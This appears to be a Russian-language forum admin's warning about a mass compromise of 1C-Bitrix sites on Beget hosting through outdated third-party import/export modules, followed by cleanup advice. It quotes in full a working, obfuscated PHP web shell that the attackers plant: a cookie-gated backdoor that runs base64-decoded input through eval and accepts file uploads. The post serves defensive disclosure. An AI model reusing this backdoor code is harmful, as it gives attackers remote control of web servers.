Admin Off Опубликовано 12 марта Опубликовано 12 марта Здравствуйте! На данный момент, обнаружены заражения сайтов на 1С-Битрикс. В основном этому сейчас подвергаются сайты на Бегете (Beget). Массовые заражения были обнаружены 12 марта в 7-8 утра по МСК. Создаются файлы с кодом ниже. 595d2372800b.php f8457f6c7536.php 5af47f5502b6.php и т.д <?php echo 409723*20;if(md5($_COOKIE["d"])=="\61\x37\60\62\x38\146\x34\70\67\143\142\x32\141\70\x34\x36\x30\67\x36\64\x36\x64\141\63\141\144\63\70\67\x38\145\143"){echo"\x6f\x6b";eval(base64_decode($_REQUEST["id"]));if($_POST["\165\160"]=="\165\x70"){@copy($_FILES["\x66\151\x6c\x65"]["\164\155\x70\x5f\x6e\x61\x6d\x65"],$_FILES["\146\x69\154\x65"]["\156\141\155\x65"]);}}?> ⚡️От компании «eSolutions»: «Многофункциональный экспорт/импорт в Excel» «Экспорт/Импорт товаров в Excel» «Импорт из XML, YML, JSON. Загрузка каталога товаров» «Массовая обработка элементов инфоблока (товаров)» ⚡️От компании «Маяк»: «Экспорт в Excel. Выгрузка каталога товаров. Создание прайс-листа» «Импорт из Excel. Загрузка каталога товаров» Под угрозой снова оказались сайты, владельцы которых не обновляли эти решения последние несколько лет. По нашим данным, разработчик исправил уязвимости в 2023 году, а также выпустил патчер. Однако некоторые владельцы сайтов пренебрегли обновлением. Решение: 1. Откатить сайт на рабочую резервную копию, обновить модули или удалить. 2. Удалить php файлы содержащие вредоносный код. Так же обновить модули или обновить. 3. Обратиться к администрации форума BXTime.ru для решения проблемы. Платная поддержка 1С-Битрикс | Продажа лицензий 1С-Битрикс | Важно - Правила форума BXTime.ru | Что нового на форуме?
Рекомендуемые сообщения